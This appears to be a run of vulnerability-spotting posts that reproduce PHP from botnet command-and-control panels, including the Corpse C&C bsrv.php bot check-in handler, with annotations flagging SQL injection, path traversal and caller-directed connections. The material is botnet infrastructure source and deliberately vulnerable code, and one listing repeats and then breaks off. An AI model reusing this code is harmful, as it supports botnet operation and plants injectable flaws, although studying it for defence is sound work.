     '<td align="right"class="tdx'.$a.'">'.$m['lim'].'</td>'.
     '<td align="right"class="tdx'.$a.'">'.$m['exc'].'</td>'.
     '<td align="right"class="tdx'.$a.'">'.$m['exct'].'</td>'.
     '<td class="tdx'.$a.'">'.($m['c']==''?'-':str_replace(',','<br>',htmlentities(SepFmtB($m['c'])))).'</td>'.
     '<td class="tdx'.$a.'">'.($m['comps']==''?'-':str_replace(',','<br>',htmlentities(SepFmtB($m['comps'])))).'</td>'.
     '<td class="tdx'.$a.'">'.($m['bns']==''?'-':str_replace(',','<br>',htmlentities(SepFmtB($m['bns'])))).'</td>'.
     '<td class="tdx'.$a.'"align="center"><input class="ism"style="width:90%"type="submit"value="'.($pedt?LNG_MBCMDS_R_EDIT:LNG_MBCMDS_R_VIEW).'"onClick="window.location=\''.QUERY_STRING.'&edit='.$m['id'].'\';return false;">';
  // The confirm() text is built with addslashes() inside a JS string inside an
  // HTML attribute; addslashes() covers quotes/backslashes but not newlines or
  // HTML-significant characters in $m['name'], so it is not a complete escape
  // for that context.
  if($pedt)print '<br><input class="ism"style="width:90%"type="submit"value="'.LNG_MBCMDS_R_RES_OK.'"onClick="javascript:ResCmd(\''.$m['id'].'\',\''.addslashes(sprintf(LNG_MBCMDS_R_RES,$m['name'])).'\');return false;"><br><input class="ism"style="width:90%"type="submit"value="'.LNG_MBCMDS_R_DEL_OK.'"onClick="javascript:DelCmd(\''.$m['id'].'\',\''.addslashes(sprintf(LNG_MBCMDS_R_DEL,$m['name'])).'\');return false;">';
  print '</td></tr>';
 }
}
else print '<tr><td align="center"colspan="10"class="tdx1"><i>'.LNG_MBCMDS_R_NONE.'</i></td></tr>';
print '</table>';
HTMLEnd();

/**
 * Builds the new / edit / view command form as an HTML string.
 *
 * @param string $cmd    query fragment appended to QUERY_STRING in the form
 *                       action ('new' or 'edit=<id>' at the call sites above)
 * @param string $title  table heading (an LNG_* constant at the call sites)
 * @param string $action submit-button label; '' switches to read-only view mode
 *                       (no <form>, inputs readonly, select disabled)
 * @param mixed  $name   field values; $stat is normalised to 0/1
 * @param mixed  $stat
 * @param mixed  $limit
 * @param mixed  $cnts
 * @param mixed  $cids
 * @param mixed  $bns
 * @param mixed  $cmds
 * @return string
 *
 * NOTE(review): $name and $cmds are passed through htmlentities(), but $limit,
 * $cnts, $cids and $bns are written into value="" attributes raw, and $cmd into
 * the action URL raw. The edit path feeds DB columns into these, the new path
 * feeds $_POST back; escape all of them the same way $name is.
 * NOTE(review): '</table></tr></td>' near the end closes tr/td in reversed
 * order; browsers tolerate it but it looks like a typo for '</td></tr>'.
 */
function CmdForm($cmd,$title,$action,$name,$stat,$limit,$cnts,$cids,$bns,$cmds)
{
 $en=$action==''?0:1; // 1 = editable form, 0 = read-only view
 $stat=$stat?1:0;
 $ro=$en?'':'readonly ';
 
 $str=$en?'<form method="POST"action="'.QUERY_STRING.'&'.$cmd.'">':'';
 $str.='<table class="tbl1"width="350"><tr><td class="td1"colspan="2">'.$title.'</td></tr>'.
    '<tr><td>'.LNG_MBCMDS_NAME.'</td><td width="100%"><input '.$ro.'type="text"name="name"value="'.htmlentities($name).'"style="width:100%"></td></tr>'.
    '<tr><td colspan="2"><table class="tbl1"><tr><td>'.LNG_MBCMDS_STAT.'</td><td width="100%"><select '.($en?'':'disabled ').'name="stat"style="width:100%">'.
    '<option value="1"'.($stat==1?' selected':'').'>'.LNG_MBCMDS_STAT_ON.'</option>'.
    '<option value="0"'.($stat==0?' selected':'').'>'.LNG_MBCMDS_STAT_OFF.'</option>'.
    '</select></td></tr>'.
    '<tr><td>'.LNG_MBCMDS_LIMIT.'</td><td width="100%"><input '.$ro.'type="text"name="limit"value="'.$limit.'"style="width:100%"></td></tr>'.
    '<tr><td>'.LNG_MBCMDS_CNTS.'</td><td width="100%"><input '.$ro.'type="text"name="cnts"value="'.$cnts.'"style="width:100%"></td></tr>'.
    '<tr><td>'.LNG_MBCMDS_CIDS.'</td><td width="100%"><input '.$ro.'type="text"name="cids"value="'.$cids.'"style="width:100%"></td></tr>'.
    '<tr><td>'.LNG_MBCMDS_BNS.'</td><td width="100%"><input '.$ro.'type="text"name="bns"value="'.$bns.'"style="width:100%"></td></tr>'.
    '<tr><td valign="top">'.LNG_MBCMDS_CMDS.'</td><td><textarea wrap="off"'.$ro.'name="cmds"style="width:100%;height:100">'.htmlentities($cmds).'</textarea></td></tr>'.
    '</table></tr></td><tr><td colspan="2"align="right">';
 // Submit button only in editable mode; the "back" button is always present.
 if($en)$str.='<input type="submit"class="ism"value="'.$action.'"style="width:100">&nbsp;';
 $str.='<input type="submit"class="ism"value="'.LNG_MBCMDS_BACK.'"style="width:100"onClick="window.location.href=\''.QUERY_STRING.'\';return false;"></td></tr>';
 if($en)$str.='</form>';
 return $str.'</table>';
}
// Normalise a comma-separated list to the stored form: items joined by '|'
// with a leading and a trailing '|' (e.g. "a,b" -> "|a|b|"). Strings of
// length 0 or 1 are returned untouched. Inverse of SepFmtB().
function SepFmt($str)
{
 if (strlen($str) <= 1) {
  return $str;
 }
 $piped = str_replace(',', '|', trim($str));
 if ($piped[0] != '|') {
  $piped = '|' . $piped;
 }
 if ($piped[strlen($piped) - 1] != '|') {
  $piped .= '|';
 }
 return $piped;
}
// Reverse of SepFmt(): turn "|a|b|" back into "a,b" by swapping '|' for ','
// and dropping one leading and one trailing ','. Strings of length 0 or 1 are
// returned untouched.
function SepFmtB($str)
{
 if (strlen($str) <= 1) {
  return $str;
 }
 $list = str_replace('|', ',', trim($str));
 if ($list[0] == ',') {
  $list = substr($list, 1);
 }
 $len = strlen($list);
 if ($list[$len - 1] == ',') {
  $list = substr($list, 0, $len - 1);
 }
 return $list;
}
?>

Shape

I was scared I was going to have some weird shape to my head and I was pleased that I didn’t.
Edward Furlong

<?php

include_once('auth.php');

// Page bootstrap for the task-add screen. auth.php is pulled in first
// (presumably the access check — it is not shown here), then the HTML, config
// and language libraries, each guarded by is_readable() with a die() fallback.
//
// NOTE(review): set_magic_quotes_runtime(1) turns on runtime magic quotes,
// which makes PHP backslash-escape data read from files and databases. It is
// deprecated since PHP 5.3 and removed in 7.0, and it is not an input
// sanitisation control.
set_magic_quotes_runtime(1);

if(is_readable('html.php')) include_once('html.php');
 else die('Could not find HTML library.');
 
if(is_readable('mycommon.php')) require('mycommon.php');
else die('Could not open configuration file.');

 if(is_readable('lang.php')) include_once('lang.php');
 else die('Could not find language library.');

// Presence of ?wohead suppresses the page header include.
$CTRL=1;
if(!isset($_GET['wohead']))
 include_once('head.php');

$msg = '';
$srch = '';

...<snip>...

 // A POSTed S_COMPID triggers the bot search; search_bot() is defined below.
 if(isset($_POST['S_COMPID'])){
 $srch = search_bot();
 };
 
 
 // Template parameters for HTML_TASK_ADD() (presumably from html.php). $mres
 // is the DB link expected from the includes above the snip; get_land() and
 // get_task() are not shown here.
 $param =array(
 "SRCH"=>$srch,
 "LAND"=>get_land($mres),
 "TASKS"=>get_task($mres),
 "MSG"=>$msg
 );
  
 
 
  
 echo HTML_TASK_ADD($param);  

//include_once('bottom.php');
//Functions++++++++++++++++++++++++++



/**
 * Search the `bots` table by CompID (wildcard '*' -> '%') or, failing that, by
 * IP, and return the rendered results table from HTML_serch_res_tbl().
 * Returns '' when both S_COMPID and S_IP are empty strings.
 *
 * NOTE(review): $_POST['S_COMPID'] / $_POST['S_IP'] are interpolated into the
 * LIKE pattern after a str_replace() only, and $_POST['S_RESULTS'] into LIMIT
 * raw — nothing is escaped or type-checked, so every field of the search form
 * is a SQL injection point. mysql_real_escape_string($value, $mres) for the
 * pattern and an (int) cast for the limit are the minimum for the ext/mysql
 * API in use. A failed query hands false to HTML_serch_res_tbl(), whose
 * @mysql_num_rows() then reports it as "No Entries found".
 */
function search_bot(){
// $_POST is a superglobal and already visible here; declaring it global is
// redundant.
global $mres,$_POST;

// Two brace-less ifs: returns '' only when BOTH fields are empty strings.
// S_IP is read without isset().
if($_POST['S_COMPID'] == '')
if($_POST['S_IP'] == '')
return '';
 



// `> ''` is a loose "non-empty string" test.
if($_POST['S_COMPID'] > ''){
 $s_id = str_replace('*',"%",$_POST['S_COMPID']);
$q = 'SELECT * FROM `bots` WHERE `FCompID` like ("'.$s_id.'") limit '.$_POST['S_RESULTS'];
 $result = mysql_query($q,$mres);
 
 return  HTML_serch_res_tbl($result);  
};
 
 
if($_POST['S_IP'] > ''){
 
 $s_ip = str_replace('*',"%",$_POST['S_IP']);
 
 $q = 'SELECT * FROM `bots` WHERE `ip_addr` like ("'.$s_ip.'") limit '.$_POST['S_RESULTS'];
 $result = mysql_query($q,$mres);
 
 return  HTML_serch_res_tbl($result);  
};


 
};



function HTML_serch_res_tbl($result){
global $LNG; 
 
  $nr = @mysql_num_rows($result);
if(!$nr)
 return "<font color=#990000>Message</font>:<em>No Entries found.</em>";
 
$ret = "<br><table width=\"543\" border=\"0\" cellpadding=\"1\" cellspacing=\"1\">"
."<tr class=\"file2\">"
."<td colspan=\"8\" class=\"bhead\"><div align=\"center\">Select Results</div></td>"
."</tr>"
."<tr class=\"file2\">"
."<td width=\"21\" bgcolor=#FCFCFC>Add</td>"
."<td width=\"26\" nowrap=\"nowrap\" bgcolor=#FCFCFC>Land</td>"
."<td width=\"82\" bgcolor=#FCFCFC nowrap=\"nowrap\">IP</td>"
."<td width=\"93\" bgcolor=#FCFCFC nowrap=\"nowrap\">Rep. Count total </td>"
."<td width=\"56\" bgcolor=#FCFCFC nowrap=\"nowrap\">Last Report</td>"
."<td width=\"100\" bgcolor=#FCFCFC nowrap=\"nowrap\">First Report</td>"
."<td width=\"40\" bgcolor=#FCFCFC nowrap=\"nowrap\">Bot Ver.</td>"
."<td width=\"44\" bgcolor=#FCFCFC nowrap=\"nowrap\">CompID</td>"
."</tr>";
 
?>

State

State Legislators are merely politicians whose darkest secret prevents them from running for a higher office.
Dennis Miller

<?php
...snip...
/**
 * Searches the .txt log files in a request-supplied directory for records and
 * collects the matching ones into "<dir>/.out.txt".
 *
 * Request inputs (all read from $_REQUEST, none validated):
 *   word   - one search term per CRLF-separated line
 *   infile - directory to scan; used directly as a filesystem path
 *   xxx    - when == 1 the collected output is streamed as a zip download
 *
 * Records are delimited by "[IP:" ... "]" markers inside each file; each file
 * is read in 1041076-byte chunks. Returns the collected text, or null when
 * $word is empty or nothing was collected (there is no explicit return on
 * those paths). When xxx == 1 the function sends headers and exit()s instead.
 *
 * Security notes:
 *  - $logfolder (from `infile`) is passed to opendir()/fopen()/filesize() as
 *    given, so the caller chooses which directory is read and where
 *    ".out.txt" is created/overwritten ("w" at the start): a path-traversal /
 *    arbitrary-file-write sink bounded only by the web server's permissions.
 *  - The collected log contents are returned/streamed without any encoding.
 *
 * NOTE(review): the code looks like decompiler output (the `!( $a != $b )`
 * conditions, the empty for-loop). Several oddities below are flagged rather
 * than described as intended behaviour, because the original control flow is
 * not visible here.
 */
function srch( )
{
  set_time_limit( 0 ); // scanning may be long-running; lift the execution time limit
  $word = $_REQUEST['word'];
  $word2 = $word; // unused
  $logfolder = $_REQUEST['infile']; // caller-chosen directory, see security notes above
  $arch = $_REQUEST['xxx'];
  if ( $word != "" )
  {
    $word = explode( "\r\n", $word ); // one search term per line
    $wordc = count( $word );
    $hl9 = fopen( $logfolder."/.out.txt", "w" ); // truncate/create the output file
    fclose( $hl9 );
    $dir = opendir( $logfolder ); // return value unchecked; readdir() on false fails
    $finded = "";
    while ( $file = readdir( $dir ) ) // a directory entry named "0" is falsy and ends this loop early
    {
      // NOTE(review): as written this is true for ".", "..", ".out.txt" and any
      // name NOT ending in ".txt" - i.e. exactly the entries one would expect
      // to skip. Most likely an inverted rendering of a `continue` guard;
      // confirm against the original before relying on this behaviour.
      if ( !( $file != "." ) || !( $file != ".." ) || !( $file != ".out.txt" ) || !( substr( $file, -4 ) == ".txt" ) )
      {
        $hl = fopen( $logfolder."/".$file, "rb" );
        $readsz = filesize( $logfolder."/".$file );
        // Chunked read: $readszR is the size of the next fread(), $readsz the
        // bytes still unread. For a file whose size is an exact multiple of the
        // chunk size the last computed $readszR is 0 (fread() with length 0
        // raises a ValueError in PHP 8).
        if ( $readsz < 1041076 )
        {
          $readszR = $readsz;
        }
        else
        {
          $readszR = 1041076;
          $readsz -= 1041076;
        }
        while ( $data = fread( $hl, $readszR ) )
        {
          $pos = 0;
          $posC = 0; // end offset of the previous record
          $posS = 0; // start offset of the current record
          // strpos() returning 0 (marker at the very start of the chunk) is falsy and ends this loop.
          while ( $pos = strpos( $data, "[IP:", $pos ) )
          {
            // Advance to just past the closing "]". If none is found strpos()
            // returns false and false + 1 == 1, so $pos falls below $posC.
            $pos = strpos( $data, "]", $pos ) + 1;
            if ( $pos < $posC )
            {
              break;
            }
            else
            {
              $posC = $pos;
              $lent = $pos - $posS;
              unset( $cutblock );
              $cutblock = substr( $data, $posS, $lent ); // the record between the previous marker and this one
              $rd = 0;
              // NOTE(review): empty loop body - $rd simply ends up equal to $wordc.
              for ( ; $rd < $wordc; ++$rd )
              {
              }
              // $word[$wordc] is one past the last term, so it is null here;
              // `null != ""` is false under loose comparison, which makes the
              // whole condition true and every record gets written out
              // regardless of the search terms. Presumably the match test
              // belonged inside the loop above - verify against the original.
              if ( !( $word[$rd] != "" ) || !( $ftmp = strpos( $cutblock, $word[$rd], 0 ) ) )
              {
                $hl9 = fopen( $logfolder."/.out.txt", "ab+" ); // reopened in append mode for every record
                fwrite( $hl9, $cutblock );
                fclose( $hl9 );
              }
            }
            unset( $rd );
            unset( $lent );
            unset( $ftmp );
            unset( $cutblock );
            $posS = $pos; // the next record starts where this one ended
          }
          unset( $data );
          // Size the next chunk (same bookkeeping as before the loop).
          if ( $readsz < 1041076 )
          {
            $readszR = $readsz;
          }
          else
          {
            $readszR = 1041076;
            $readsz -= 1041076;
          }
        }
        unset( $data );
        fclose( $hl );
      }
    }
    if ( 0 < filesize( $logfolder."/.out.txt" ) )
    {
      $hl9 = fopen( $logfolder."/.out.txt", "r" );
      $finded = fread( $hl9, filesize( $logfolder."/.out.txt" ) );
      fclose( $hl9 );
      if ( $arch == 1 )
      {
        // Stream the collected records as a zip attachment. cl_zip is not
        // defined in this listing.
        header( "Content-type:application/octet-stream" );
        $cl_Zip = new cl_zip( );
        $cl_Zip->onaddfile( $finded, "log".time( ).".txt" );
        // NOTE(review): ondumpfileout() is called twice (once for the length,
        // once for the body) and time() twice, so the inner and outer file
        // names can differ across a second boundary.
        header( "Content-Length:".strlen( $cl_Zip->ondumpfileout( ) ) );
        header( "Content-disposition:attachment;filename=log".time( ).".zip" );
        echo $cl_Zip->ondumpfileout( );
        exit( );
      }
      return $finded;
    }
  }
}
...snip...
?>

Feathers –SQLi

Details

Affected Software: Corpse C&C

Fixed in Version: Not Patched

Issue Type: SQL Injection

Original Code: Found Here

Details

This week’s bugs are in the CORPSE C&C (in the bsrv.php file). There are a couple of bugs here, most of them very straightforward. Funny stuff first… if $ver is blank, we will fail the “security check”. So, in order to reach any of these vulns, we have to provide an arbitrary value for $ver. $ver is set from $_GET[‘ver’], so we have to provide a bsrv.php?ver=pwnd for each request in order to reach the vulnerable code. It’s rigorous security checks like this that make exploitation difficult.


$id and $param are validated through a manual process (code on lines 27–36). I don’t know why the developer didn’t take advantage of built-in escaping routines… but the validation provided here seems to defend against common vulns. What’s also puzzling is why the other variables weren’t validated/escaped. Veteran Spot the Vuln readers have seen this pattern before (escape one variable, miss the next) in other software, but for some reason I still find it surprising every time I see it. Now, let’s get onto the actual bugs. The most obvious are $uid and $httpport, which are set directly from user-controlled input ($_GET). These two variables are then used to build a dynamic SQL statement. This results in SQL injection.


Additionally, $uptimem and $uptimeh are used to set $sql_uptime. $sql_uptime is then used in a dynamic SQL statement, resulting in yet another SQL injection.
$browser is taken from getenv(“HTTP_USER_AGENT”), which is attacker controlled (the User-Agent header in the HTTP request). Although $browser isn’t used on this page, it’s just asking for trouble :)


Upon first glance, it seems like $real_ip and $socksport could be used to reach a SQL injection. After some more investigation, it is likely that the fsockopen call would fail before $real_ip and $socksport could be passed to a dynamic SQL statement. With that said, $real_ip and $socksport can still be used to generate an fsockopen request to an arbitrary system (line 59).

Developers Solution

<?php

// bsrv.php - bot check-in handler (top-level script).
//
// Every parameter below is taken verbatim from the query string. Only $id and
// $param go through the character replacements further down, and neither of
// them is used by the live SQL in this file. $uid, $httpport, $socksport and
// $sql_uptime (built from $uptimeh/$uptimem) are concatenated into the
// INSERT/UPDATE statements with no escaping at all - SQL injection. $real_ip
// (X-Forwarded-For, a client-supplied header) and $socksport are handed to
// fsockopen(), so the script opens an outbound TCP connection to a host:port
// chosen by the caller. Remediation: integer casts for the ports, a strict
// format check on uid, prepared statements, and no connect-back to
// header-supplied addresses.
//
// $wm, $lang, $browser, $time, $year/$month/$day and $okk are assigned but
// never read by live code (some appear only in the commented-out logging).

// Read all request parameters (raw, unvalidated).
$id = $_GET['id'];
$httpport = $_GET['httpport'];
$socksport = $_GET['socksport'];
$uptimem = $_GET['uptimem'];
$uptimeh = $_GET['uptimeh'];
$param = $_GET['param'];
$ver = $_GET['ver'];
$uid = $_GET['uid'];
$wm = $_GET['wm'];
$lang = $_GET['lang'];
//$ssip = $_GET['ssip'] ;
$ip = getenv("REMOTE_ADDR");
$real_ip = getenv("HTTP_X_FORWARDED_FOR"); // client-supplied header; not a trustworthy address
$browser = getenv("HTTP_USER_AGENT"); // unused in this file

// "Security check": the only gate on the rest of the script is that `ver` is
// non-empty; its value is not used anywhere else.
if($ver == ''){
 exit;
}

include_once('./mysqllog.php'); // presumably defines $mysql_host/$mysql_login/$mysql_pass/$mysql_db used below - not visible here

// Character replacements for $id and $param only. ereg_replace() was removed
// in PHP 7, and the entity strings lack the closing ';' (&#8249; etc.).
// None of the values that reach the SQL below pass through this.
$id = ereg_replace("<","&#8249",$id);
$id = ereg_replace(">","&#8250",$id);
$id = ereg_replace("\"","&#8221",$id);
$id = ereg_replace(";","",$id);
$id = ereg_replace("%","",$id);
$param = ereg_replace("<","&#8249",$param);
$param = ereg_replace(">","&#8250",$param);
$param = ereg_replace("\"","&#8221",$param);
$param = ereg_replace(";","",$param);
$param = ereg_replace("%","",$param);



$date = date("Y-m-d");
$time=date("H:i:s"); // unused
list($year, $month, $day) = explode('-', $date); // only referenced by the commented-out log lines
$sql_uptime = "$uptimeh:$uptimem"; // both parts raw from $_GET; used in the SQL below

// Path 1: the caller sent X-Forwarded-For. Connect back to that address on
// $socksport (30 s timeout); on success, insert/update the socks row and send
// the command payload. $fp is never fclose()d on either path.
if($real_ip != "") {
 $fp = fsockopen($real_ip,$socksport, $errno, $errstr, 30);
 if(!$fp) {
  $okk = false;   // never read; execution falls through to path 2
 } else {
  $okk = true;
  
  $link = mysql_connect($mysql_host, $mysql_login, $mysql_pass) or die("Could not connect:" . mysql_error());
  mysql_select_db($mysql_db, $link) or die("Could not select:" . mysql_error());
  $query = 'SELECT COUNT(*) FROM socks where uid = "'. $uid .'"'; // $uid unescaped
  $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  $count = mysql_result($result, 0);
  if ($count == 0) {
   $query = 'INSERT INTO socks VALUES ("'.$uid.'","'. $real_ip . '","'. $httpport .'","'. $socksport . '","'. $sql_uptime .'","'. mktime() .'","0")'; // every interpolated value is unescaped
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  } else {
   // NOTE(review): the missing space in '"WHERE' is probably a page-extraction
   // artifact (this page drops spaces after closing quotes elsewhere); do not
   // treat the exact SQL text as authoritative.
   $query = 'UPDATE socks SET  `ip` = "'. $real_ip .'",`hport` = "'. $httpport .'",`sport` = "'. $socksport .'",`uptime` = "'. $sql_uptime .'",`update` = "'. mktime() .'"WHERE `uid` = "'.$uid.'"';
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
   $query = 'COMMIT'; // no transaction start or autocommit change is visible, so this appears to be a no-op
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  }
  mysql_close($link);

  //$fh=fopen("logs/P.$day.$month.txt","a+");
  //ip:hport:sport:bport:uptime:uid
  //fputs($fh,"$real_ip@$httpport@$socksport@$param@$uptimeh:$uptimem@$uid\r\n");
  //fclose($fh);
  send_command(); // echoes the payload and exits; defined at the bottom of the file
  exit;
 }
}

// Path 2: REMOTE_ADDR differs from X-Forwarded-For (no XFF, or the connect-back
// in path 1 failed). Same logic as path 1 with $ip in place of $real_ip; a
// shared helper would remove the duplication. Unlike path 1, a failed
// connect-back here still sends the command payload.
if( ($ip != "") && ($ip != $real_ip) ) {
 $fp = fsockopen($ip,$socksport, $errno, $errstr, 30);
 if(!$fp) {
  send_command();
  exit;
 } else {
  $link = mysql_connect($mysql_host, $mysql_login, $mysql_pass) or die("Could not connect:" . mysql_error());
  mysql_select_db($mysql_db, $link) or die("Could not select:" . mysql_error());
  $query = 'SELECT COUNT(*) FROM socks where uid = "'. $uid .'"'; // $uid unescaped
  $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  $count = mysql_result($result, 0);
  if ($count == 0) {
   $query = 'INSERT INTO socks VALUES ("'.$uid.'","'. $ip . '","'. $httpport .'","'. $socksport . '","'. $sql_uptime .'","'. mktime() .'","0")'; // every interpolated value is unescaped
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  } else {
   $query = 'UPDATE socks SET  `ip` = "'. $ip .'",`hport` = "'. $httpport .'",`sport` = "'. $socksport .'",`uptime` = "'. $sql_uptime .'",`update` = "'. mktime() .'"WHERE `uid` = "'.$uid.'"';
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
   $query = 'COMMIT'; // see the note on the COMMIT in path 1
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  }
  mysql_close($link);

  //$fh=fopen("logs/P.$day.$month.txt","a+");
  //ip:hport:sport:bport:uptime:uid
  //fputs($fh,"$ip@$httpport@$socksport@$param@$uptimeh:$uptimem@$uid\r\n");
  //fclose($fh);
  send_command();
  exit;
 }
}

// Fallthrough (REMOTE_ADDR empty, or equal to X-Forwarded-For after a failed
// connect-back): send the payload without touching the database.
send_command();
exit;

/**
 * Writes the command payload for the calling bot to the response and exits.
 *
 * If logs/uid.ini is empty every caller receives the contents of logs/cfg.dat;
 * otherwise only callers whose uid matches a line of uid.ini do. Anyone else
 * gets the bare "CMND\r\n" marker.
 *
 * Notes:
 *  - $uid is read below without a `global` declaration, so inside this
 *    function it is an undefined local (null), not the request value set at
 *    the top of the file. `$array[$ei] == $uid` therefore compares against
 *    null, which under loose comparison matches an empty line (e.g. a trailing
 *    blank line in uid.ini), not the caller's uid.
 *  - filesize() returns false when the file is missing and `false == 0` is
 *    true, so a missing uid.ini behaves like an empty one (payload for all).
 *  - Each line is shortened by exactly two bytes (assumes CRLF endings); a
 *    last line without a CRLF loses two real characters. rtrim($line, "\r\n")
 *    would be the safe equivalent.
 *  - The function does not return on the payload paths (exit).
 */
function send_command() {
$cmdname="logs/cfg.dat"; // command payload sent to authorised callers
$cmduid="logs/uid.ini";  // one uid per line; empty file = no restriction

// Empty (or missing - see notes) uid list: send the payload to everyone.
if(filesize("$cmduid") == 0) {
 $fh=fopen($cmdname,"r");
 $cfgdata=fread($fh,filesize($cmdname));
 fclose($fh);
 echo "CMND$cfgdata";
 exit;
}

$array=file($cmduid);
$kolvo=count($array);
for($ei=0;$ei<$kolvo;$ei++) {
 $llen=strlen($array[$ei]);
 $llen=$llen-2; // strip an assumed CRLF
 $array[$ei]=substr($array[$ei],0,$llen);
 if($array[$ei] == $uid) { // $uid is undefined here (no `global`) - compares against null
  $fh=fopen($cmdname,"r");
  $cfgdata=fread($fh,filesize($cmdname));
  fclose($fh);
  echo "CMND$cfgdata";
  exit;
 }
}
echo "CMND\r\n"; // no match: marker only
}

?>

Feathers

It is not only fine feathers that make fine birds.
Aesop

<?php

// bsrv.php - bot check-in handler (top-level script).
//
// Every parameter below is taken verbatim from the query string. Only $id and
// $param go through the character replacements further down, and neither of
// them is used by the live SQL in this file. $uid, $httpport, $socksport and
// $sql_uptime (built from $uptimeh/$uptimem) are concatenated into the
// INSERT/UPDATE statements with no escaping at all - SQL injection. $real_ip
// (X-Forwarded-For, a client-supplied header) and $socksport are handed to
// fsockopen(), so the script opens an outbound TCP connection to a host:port
// chosen by the caller. Remediation: integer casts for the ports, a strict
// format check on uid, prepared statements, and no connect-back to
// header-supplied addresses.
//
// $wm, $lang, $browser, $time, $year/$month/$day and $okk are assigned but
// never read by live code (some appear only in the commented-out logging).

// Read all request parameters (raw, unvalidated).
$id = $_GET['id'];
$httpport = $_GET['httpport'];
$socksport = $_GET['socksport'];
$uptimem = $_GET['uptimem'];
$uptimeh = $_GET['uptimeh'];
$param = $_GET['param'];
$ver = $_GET['ver'];
$uid = $_GET['uid'];
$wm = $_GET['wm'];
$lang = $_GET['lang'];
//$ssip = $_GET['ssip'] ;
$ip = getenv("REMOTE_ADDR");
$real_ip = getenv("HTTP_X_FORWARDED_FOR"); // client-supplied header; not a trustworthy address
$browser = getenv("HTTP_USER_AGENT"); // unused in this file

// "Security check": the only gate on the rest of the script is that `ver` is
// non-empty; its value is not used anywhere else.
if($ver == ''){
 exit;
}

include_once('./mysqllog.php'); // presumably defines $mysql_host/$mysql_login/$mysql_pass/$mysql_db used below - not visible here

// Character replacements for $id and $param only. ereg_replace() was removed
// in PHP 7, and the entity strings lack the closing ';' (&#8249; etc.).
// None of the values that reach the SQL below pass through this.
$id = ereg_replace("<","&#8249",$id);
$id = ereg_replace(">","&#8250",$id);
$id = ereg_replace("\"","&#8221",$id);
$id = ereg_replace(";","",$id);
$id = ereg_replace("%","",$id);
$param = ereg_replace("<","&#8249",$param);
$param = ereg_replace(">","&#8250",$param);
$param = ereg_replace("\"","&#8221",$param);
$param = ereg_replace(";","",$param);
$param = ereg_replace("%","",$param);



$date = date("Y-m-d");
$time=date("H:i:s"); // unused
list($year, $month, $day) = explode('-', $date); // only referenced by the commented-out log lines
$sql_uptime = "$uptimeh:$uptimem"; // both parts raw from $_GET; used in the SQL below

// Path 1: the caller sent X-Forwarded-For. Connect back to that address on
// $socksport (30 s timeout); on success, insert/update the socks row and send
// the command payload. $fp is never fclose()d on either path.
if($real_ip != "") {
 $fp = fsockopen($real_ip,$socksport, $errno, $errstr, 30);
 if(!$fp) {
  $okk = false;   // never read; execution falls through to path 2
 } else {
  $okk = true;
  
  $link = mysql_connect($mysql_host, $mysql_login, $mysql_pass) or die("Could not connect:" . mysql_error());
  mysql_select_db($mysql_db, $link) or die("Could not select:" . mysql_error());
  $query = 'SELECT COUNT(*) FROM socks where uid = "'. $uid .'"'; // $uid unescaped
  $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  $count = mysql_result($result, 0);
  if ($count == 0) {
   $query = 'INSERT INTO socks VALUES ("'.$uid.'","'. $real_ip . '","'. $httpport .'","'. $socksport . '","'. $sql_uptime .'","'. mktime() .'","0")'; // every interpolated value is unescaped
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  } else {
   // NOTE(review): the missing space in '"WHERE' is probably a page-extraction
   // artifact (this page drops spaces after closing quotes elsewhere); do not
   // treat the exact SQL text as authoritative.
   $query = 'UPDATE socks SET  `ip` = "'. $real_ip .'",`hport` = "'. $httpport .'",`sport` = "'. $socksport .'",`uptime` = "'. $sql_uptime .'",`update` = "'. mktime() .'"WHERE `uid` = "'.$uid.'"';
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
   $query = 'COMMIT'; // no transaction start or autocommit change is visible, so this appears to be a no-op
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  }
  mysql_close($link);

  //$fh=fopen("logs/P.$day.$month.txt","a+");
  //ip:hport:sport:bport:uptime:uid
  //fputs($fh,"$real_ip@$httpport@$socksport@$param@$uptimeh:$uptimem@$uid\r\n");
  //fclose($fh);
  send_command(); // echoes the payload and exits; defined at the bottom of the file
  exit;
 }
}

// Path 2: REMOTE_ADDR differs from X-Forwarded-For (no XFF, or the connect-back
// in path 1 failed). Same logic as path 1 with $ip in place of $real_ip; a
// shared helper would remove the duplication. Unlike path 1, a failed
// connect-back here still sends the command payload.
if( ($ip != "") && ($ip != $real_ip) ) {
 $fp = fsockopen($ip,$socksport, $errno, $errstr, 30);
 if(!$fp) {
  send_command();
  exit;
 } else {
  $link = mysql_connect($mysql_host, $mysql_login, $mysql_pass) or die("Could not connect:" . mysql_error());
  mysql_select_db($mysql_db, $link) or die("Could not select:" . mysql_error());
  $query = 'SELECT COUNT(*) FROM socks where uid = "'. $uid .'"'; // $uid unescaped
  $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  $count = mysql_result($result, 0);
  if ($count == 0) {
   $query = 'INSERT INTO socks VALUES ("'.$uid.'","'. $ip . '","'. $httpport .'","'. $socksport . '","'. $sql_uptime .'","'. mktime() .'","0")'; // every interpolated value is unescaped
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  } else {
   $query = 'UPDATE socks SET  `ip` = "'. $ip .'",`hport` = "'. $httpport .'",`sport` = "'. $socksport .'",`uptime` = "'. $sql_uptime .'",`update` = "'. mktime() .'"WHERE `uid` = "'.$uid.'"';
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
   $query = 'COMMIT'; // see the note on the COMMIT in path 1
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  }
  mysql_close($link);

  //$fh=fopen("logs/P.$day.$month.txt","a+");
  //ip:hport:sport:bport:uptime:uid
  //fputs($fh,"$ip@$httpport@$socksport@$param@$uptimeh:$uptimem@$uid\r\n");
  //fclose($fh);
  send_command();
  exit;
 }
}

// Fallthrough (REMOTE_ADDR empty, or equal to X-Forwarded-For after a failed
